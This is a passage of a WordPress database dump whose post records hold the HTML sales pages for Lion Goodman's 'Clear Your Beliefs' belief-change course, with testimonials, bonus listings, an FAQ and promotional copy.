the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 16:38:21', '2014-06-17 21:38:21', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(938, 4194, '2014-06-17 16:37:00', '2014-06-17 21:37:00', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" 